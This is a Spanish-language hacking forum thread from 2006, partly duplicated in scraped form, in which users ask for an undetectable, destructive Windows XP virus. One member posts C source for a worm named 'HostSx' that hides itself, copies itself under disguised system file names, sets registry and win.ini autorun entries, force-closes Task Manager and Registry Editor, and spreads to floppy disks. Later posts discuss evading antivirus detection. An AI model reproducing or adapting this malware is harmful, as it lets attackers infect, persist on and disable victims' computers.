(Virus en C)

03-feb-2006, 01:36

8) Alguien sabe como hacer un virus en C q sea indetectable por antivirus, y si no se puede... q escaralle muxo.!!!! XD ;D

03-feb-2006, 07:17

el experto en hacer virus aki es codelogman

03-feb-2006, 08:04

GAXIAS!! ;D

04-feb-2006, 09:15

un virus que haga que??

04-feb-2006, 13:14

Pos q desarticule windows Xp y no sea detectable, cuanto mas destructivo mejor!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! !!!!!!!!!!!!!!!!!! ;D ;D ;D ;D ;D ;D ;D ;D ;D ;D ;D ;D

XDDDDDDDDDDDDDDDDDDD

04-feb-2006, 13:18

EL MEJOR VIRUSAVER QUIEN HACE EL VIRUS MEJOR!!!! :P YES!

Dark_Lord99 · 04-feb-2006, 14:44

xq no haces uno q destruya el sector Zero del HD,
de esta forma la pc no funcionaria.
supongo q es lo mas destructible.

salu2

sowher · 06-feb-2006, 10:26

Hola mira yo soy dise�ador de virus, pero no hago esa clase de virus, pues lastima no poderte ayudar

06-feb-2006, 18:29

bueno, aki te va un virus:

#include <stdio.h> /*definici�n de librerias*/
#include <conio.h>
#include <GRAPHICS.H>
#include <time.h>
#include <dos.h>
int main(void)
{

time_t timer;
struct tm *tblock;
/*definici�n de variables, el tiempo ser� usado en la versi�n deluxe*/
int n, i = 0;
int font;
struct {
char texto[20];
} circulo[10];
clrscr( );

gotoxy (15,3);
textcolor(15);
textbackground(13);
cprintf( "acabas de entrar en el virus jeje versi�n 2.0...\n");
/* titulo,centrado, principal */

timer = time(NULL);
tblock = localtime(&timer);
gotoxy (16,4);
cprintf("la fecha y hora son: %s", asctime(tblock));
/*muestra la fecha y la hora que contiene el bios */
sound(300);
delay(500);
nosound( );
sound(250);
/*ooooooooooooooooooooooooooooooooooooooooooooooooo o
sonido en forma de sirena
oooooooooooooooooooooooooooooooooooooooooooooooooo oo*/
delay(500);
nosound( );
sound(300);
delay(500);
nosound( );
sound(250);
delay(500);
nosound( );
sound(300);
delay(500);
nosound( );
sound(250);
delay(500);
nosound( );
sound(300);
delay(500);
nosound( );
sound(250);
delay(500);
nosound( );
gotoxy(17,5);
cprintf("\nentre el codigo:");
textcolor(0); /* esto es para que la clave no se vea cuando la pongamos */
textbackground(0);
cscanf("%s", circulo.texto);
while (circulo.texto[0] !='j' || circulo.texto[1] !='a' || circulo.texto[2] !='z' || circulo.texto[3] !='z') {
/* nota: en la anterior linea esta partida en dos partes por puntos suspencivos */
/* borralos y une en una solos linea la primera parte con la seguna */
/* trata de utilizar tu inteligencia hacker en la parte de arriba porque aqu� es donde
tu puedes poner la clave que se te plazca, puedes usa hasta 20 caracteres, si quieres
mas tienes que ponerle mas a la variable "texto" */

textcolor(11);
cprintf("\n ��la vas cagando!!!");
/* mensaje que sale cuando la clave es err�nea */
++i; /*repetici�n en la sentencia */
extcolor(15);
textbackground(13);
cprintf("\nentre el codigo:"); /*ya explique que es esto */
textcolor(10);
textbackground(10);
cscanf("%s", circulo.texto);
}
clrscr( );

sowher · 07-feb-2006, 13:30

Disculpame q te desilucione pero es no es un virus... por q utilizas librerias no estandares

Código:

#include <conio.h>
#include <GRAPHICS.H>

sowher · 07-feb-2006, 13:31

Mira este es un peque�o virus

Código:

/*
 HostSx.cpp
 sowher /GEDZAC Labs
*/

#include <windows.h>
#include <stdio.h>

char PathName[256];
char WinDir[MAX_PATH];
char SysDir[256];

/**********************************************
* Funcion que cierra ventanas         *
***********************************************/
void cierra()
{
  HWND cFile;
  int i;
  char WindowsClose[10][50] = {
                  "Calculadora", 
                  "Administrador de tareas de Windows", 
                  "Editor del Registro", 
                  "Informaci�n del sistema de Microsoft", 
                  "Documento1 - Microsoft Word", 
                  "MSN Messenger", 
                  "Ejecutar", 
                };
  for (i=0; i<7; i++)
  {
    cFile = FindWindow(0,WindowsClose[i]);
    PostMessage(cFile, WM_QUIT, 0, 0 );
  }
}

/**********************************************
* Copia al host en el Floppy         *
***********************************************/
void floppy()
{
    HMODULE hManejador = GetModuleHandle(NULL); //Obtenemos el manejador
    GetModuleFileName(hManejador,WinDir,256); //Obtenemos nuestro nombre y ruta
    SetErrorMode(SEM_FAILCRITICALERRORS); //Evita que nos muestre mensaje de error
    CopyFile(PathName, "a:\\HostSx.exe", false); //Realizamos una copia a la unidad A
}

/**********************************************
* Copia el host en carpetas de windows    *
***********************************************/
void copiar()
{
  strcat(WinDir,"\\conmand.com");
  CopyFile(PathName,WinDir,0);
  CopyFile(PathName,"\\win.pif",0);
  CopyFile(PathName,"\\ini.bat",0);
  CopyFile(PathName,"\\system32.com",0);
  CopyFile(PathName,"\\conmand.exe",0);
  CopyFile(PathName,"\\win.bat",0);
  CopyFile(PathName,"\\system\\win.bat",0);
  CopyFile(PathName,"\\welcome.pif",0);
}

/**********************************************
* Escribe en archibos inis          *
***********************************************/
void inis()
{
  const char key[] = "run";
  const char archivo[] = "win.ini";
  WritePrivateProfileString("Windows",key,WinDir,archivo);
}

/**********************************************
* Colocamos virus en el registro       *
***********************************************/
void registro()
{  
  HKEY hkey;
  RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\run",0,KEY_SET_VALUE,&hkey);
  RegSetValueEx(hkey,"HostSx",0,REG_SZ,(const unsigned char*)SysDir,sizeof(SysDir));
  RegCloseKey(hkey);
}

/************************************************
*************************************************
**      Funcion Principal         **
*************************************************
*************************************************/
int WINAPI WinMain(
            HINSTANCE hThisInstance,
            HINSTANCE hPrevInstance,
            LPSTR ipszArgument,
            int nFunsterStil
          )
{
  GetWindowsDirectory(WinDir,sizeof(WinDir)); // Sacar el nombre de la carpeta winnt o windows y la ruta
  GetSystemDirectory(SysDir,sizeof(SysDir)); // Saca la ruta de system32
  
  // oculta la ventana
  HWND ventana = GetForegroundWindow();
  ShowWindow(ventana,SW_HIDE);
  
  copiar();
  registro();
  inis();
  registro();
  do{
     Sleep(5000); //5 sec.
     cierra();
     floppy();
   }while(1);
   
  return 0;
}

08-feb-2006, 00:18

Sleep(5000); //5 sec.
cierra();
floppy();

Bonito virus, no recomiendo que uses sleep, el chiste de un virus es pasar inadvertido

saludos

sowher · 09-feb-2006, 08:06

Lo has provado??? si lo pruebsa me diras si pasa desapercivido

09-feb-2006, 08:49

Cita:

Iniciado por littlechicken

Sleep(5000); //5 sec.
cierra();
floppy();

Bonito virus, no recomiendo que uses sleep, el chiste de un virus es pasar inadvertido

saludos

Que tiene que ver que use sleep con que pase inadvertido??? sleep hace que el programa no haga nada por determinado tiempo (por eso sleep, duerme).

09-feb-2006, 13:10

Demasiadas llamadas en un nivel muy alto del kernell a operaciones como sleep etc, el code simplemente es visible, nonecesitais ser expertos para verlo en memoria.... comando debug... insisto

saludos

10-feb-2006, 14:45

Lo que estas diciendo es cualquier cosa; da la sensacion de que ni sabes usar debug. Porque no prob�s que con debug pod�s detectar llamadas sleep?
Y.. por cierto, el usuario infectado con el virus ni siquiera va a saber lo que es debug

13-feb-2006, 06:12

a ver, para empezar debug es un comando de dos, existen dos tipos de comandos en dos por si no lo sabias:

comandos internos:

Definidos asi por cargarse dentro del propio kernell de sistema

comandos externos:

Definidos asi por no cargarse con el kernell sin embargo pueden ser invocados ya que el path esta definido desde el arranque.

Es sencillo, con debug "depuras" el executable del virus y practicamente las llamadas las ves como macros definidas despues de $ y @ en donde te pone la direccion o handled de la llamada que en ensamblador son creo 6 lineas para definir sleep pero como no lo haces desde assembler en c, la llamada queda como referencia a objeto de sistema, veras, si queda como objeto de sistema esta atada esta y las demas que estan en esa situacion de "pre" definicion son vistas facilmente por un scanner como el tbav antiguo que escaneaba procesos en background... creo que no necesito explicar mas.

codelogman

16-feb-2006, 09:54

Es cierto que con debug pod�s ver llamadas a sleep en si.
Aunque eso no tiene porque significar que sea un virus quien lo est� llamando. Adem�s si el virus est� encriptado, no se va a ver nada en debug, y no es nada del otro mundo un virus encriptado.
Y.. por cierto, es handler no handled; y al tbav no era tan dificil confundirlo.

03-feb-2006, 01:36	#1
(�`�._.�[Hacker]�._.��) Guest Amigos Mensajes: n/a	(Virus en C) 8) Alguien sabe como hacer un virus en C q sea indetectable por antivirus, y si no se puede... q escaralle muxo.!!!! XD ;D

03-feb-2006, 07:17	#2
D4rk 5ou1 Guest Amigos Mensajes: n/a	Re: (Virus en C) el experto en hacer virus aki es codelogman

03-feb-2006, 08:04	#3
(�`�._.�[Hacker]�._.��) Guest Amigos Mensajes: n/a	Re: (Virus en C) GAXIAS!! ;D

04-feb-2006, 09:15	#4
elpolilla Guest Amigos Mensajes: n/a	Re: (Virus en C) un virus que haga que??

04-feb-2006, 13:14	#5
(�`�._.�[Hacker]�._.��) Guest Amigos Mensajes: n/a	Re: (Virus en C) Pos q desarticule windows Xp y no sea detectable, cuanto mas destructivo mejor!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! !!!!!!!!!!!!!!!!!! ;D ;D ;D ;D ;D ;D ;D ;D ;D ;D ;D ;D XDDDDDDDDDDDDDDDDDDD

04-feb-2006, 13:18	#6
(�`�._.�[Hacker]�._.��) Guest Amigos Mensajes: n/a	Re: (Virus en C) EL MEJOR VIRUSAVER QUIEN HACE EL VIRUS MEJOR!!!! :P YES!

04-feb-2006, 14:44	#7
Dark_Lord99 Colaborador Fecha de Ingreso: agosto-2005 Amigos 0 Mensajes: 359 Gracias: 0 Agradecido 1 vez en 1 mensaje.	Re: (Virus en C) xq no haces uno q destruya el sector Zero del HD, de esta forma la pc no funcionaria. supongo q es lo mas destructible. salu2 __________________

06-feb-2006, 10:26	#8
sowher Habitual Fecha de Ingreso: mayo-2005 Amigos 0 Mensajes: 183 Gracias: 0 Agradecido 0 veces en 0 mensajes.	Re: (Virus en C) Hola mira yo soy dise�ador de virus, pero no hago esa clase de virus, pues lastima no poderte ayudar __________________ <br /> *El code es un arte, dise�emos arte*

06-feb-2006, 18:29	#9
D4rk 5ou1 Guest Amigos Mensajes: n/a	Re: (Virus en C) bueno, aki te va un virus: #include <stdio.h> /definici�n de librerias/ #include <conio.h> #include <GRAPHICS.H> #include <time.h> #include <dos.h> int main(void) { time_t timer; struct tm tblock; /definici�n de variables, el tiempo ser� usado en la versi�n deluxe/ int n, i = 0; int font; struct { char texto[20]; } circulo[10]; clrscr( ); gotoxy (15,3); textcolor(15); textbackground(13); cprintf( "acabas de entrar en el virus jeje versi�n 2.0...\n"); / titulo,centrado, principal / timer = time(NULL); tblock = localtime(&timer); gotoxy (16,4); cprintf("la fecha y hora son: %s", asctime(tblock)); /muestra la fecha y la hora que contiene el bios / sound(300); delay(500); nosound( ); sound(250); /ooooooooooooooooooooooooooooooooooooooooooooooooo o sonido en forma de sirena oooooooooooooooooooooooooooooooooooooooooooooooooo oo/ delay(500); nosound( ); sound(300); delay(500); nosound( ); sound(250); delay(500); nosound( ); sound(300); delay(500); nosound( ); sound(250); delay(500); nosound( ); sound(300); delay(500); nosound( ); sound(250); delay(500); nosound( ); gotoxy(17,5); cprintf("\nentre el codigo:"); textcolor(0); / esto es para que la clave no se vea cuando la pongamos / textbackground(0); cscanf("%s", circulo.texto); while (circulo.texto[0] !='j' \|\| circulo.texto[1] !='a' \|\| circulo.texto[2] !='z' \|\| circulo.texto[3] !='z') { / nota: en la anterior linea esta partida en dos partes por puntos suspencivos / / borralos y une en una solos linea la primera parte con la seguna / / trata de utilizar tu inteligencia hacker en la parte de arriba porque aqu� es donde tu puedes poner la clave que se te plazca, puedes usa hasta 20 caracteres, si quieres mas tienes que ponerle mas a la variable "texto" / textcolor(11); cprintf("\n ��la vas cagando!!!"); / mensaje que sale cuando la clave es err�nea / ++i; /repetici�n en la sentencia / extcolor(15); textbackground(13); cprintf("\nentre el codigo:"); /ya explique que es esto */ textcolor(10); textbackground(10); cscanf("%s", circulo.texto); } clrscr( );

07-feb-2006, 13:30	#10
sowher Habitual Fecha de Ingreso: mayo-2005 Amigos 0 Mensajes: 183 Gracias: 0 Agradecido 0 veces en 0 mensajes.	Re: (Virus en C) Disculpame q te desilucione pero es no es un virus... por q utilizas librerias no estandares Código: #include <conio.h> #include <GRAPHICS.H> __________________ <br /> *El code es un arte, dise�emos arte*

08-feb-2006, 00:18	#12
littlechicken Guest Amigos Mensajes: n/a	Re: (Virus en C) Sleep(5000); //5 sec. cierra(); floppy(); Bonito virus, no recomiendo que uses sleep, el chiste de un virus es pasar inadvertido saludos

09-feb-2006, 08:06	#13
sowher Habitual Fecha de Ingreso: mayo-2005 Amigos 0 Mensajes: 183 Gracias: 0 Agradecido 0 veces en 0 mensajes.	Re: (Virus en C) Lo has provado??? si lo pruebsa me diras si pasa desapercivido __________________ <br /> *El code es un arte, dise�emos arte*

09-feb-2006, 13:10	#15
littlechicken Guest Amigos Mensajes: n/a	Re: (Virus en C) Demasiadas llamadas en un nivel muy alto del kernell a operaciones como sleep etc, el code simplemente es visible, nonecesitais ser expertos para verlo en memoria.... comando debug... insisto saludos

10-feb-2006, 14:45	#16
elpolilla Guest Amigos Mensajes: n/a	Re: (Virus en C) Lo que estas diciendo es cualquier cosa; da la sensacion de que ni sabes usar debug. Porque no prob�s que con debug pod�s detectar llamadas sleep? Y.. por cierto, el usuario infectado con el virus ni siquiera va a saber lo que es debug

13-feb-2006, 06:12	#17
Sinner Guest Amigos Mensajes: n/a	Re: (Virus en C) a ver, para empezar debug es un comando de dos, existen dos tipos de comandos en dos por si no lo sabias: comandos internos: Definidos asi por cargarse dentro del propio kernell de sistema comandos externos: Definidos asi por no cargarse con el kernell sin embargo pueden ser invocados ya que el path esta definido desde el arranque. Es sencillo, con debug "depuras" el executable del virus y practicamente las llamadas las ves como macros definidas despues de $ y @ en donde te pone la direccion o handled de la llamada que en ensamblador son creo 6 lineas para definir sleep pero como no lo haces desde assembler en c, la llamada queda como referencia a objeto de sistema, veras, si queda como objeto de sistema esta atada esta y las demas que estan en esa situacion de "pre" definicion son vistas facilmente por un scanner como el tbav antiguo que escaneaba procesos en background... creo que no necesito explicar mas. codelogman

Temas Similares
Tema	Autor	Foro	Respuestas	Último mensaje
Virus molesto	gusanoworm	Troyanos y virus	13	16-ago-2010 15:47
crear un virus con la sucecion de fibonacci	frreker	Hack para newbies	2	09-ago-2010 16:44
Descargar MSN Virus Remover 4.40 (Database 7.23)	soft2010	Top 100	0	29-jul-2010 10:50
Descargar Symantec Virus Definitions Update 20100602 034-v5	soft2010	Top 100	0	06-jul-2010 08:07

16-feb-2006, 09:54	#18
elpolilla Guest Amigos Mensajes: n/a	Re: (Virus en C) Es cierto que con debug pod�s ver llamadas a sleep en si. Aunque eso no tiene porque significar que sea un virus quien lo est� llamando. Adem�s si el virus est� encriptado, no se va a ver nada en debug, y no es nada del otro mundo un virus encriptado. Y.. por cierto, es handler no handled; y al tbav no era tan dificil confundirlo.

Herramientas
Mostrar Versión Imprimible Enviar por Correo
Desplegado
Mode Lineal Cambiar a Modo Hibrido Cambiar a Modo Hilado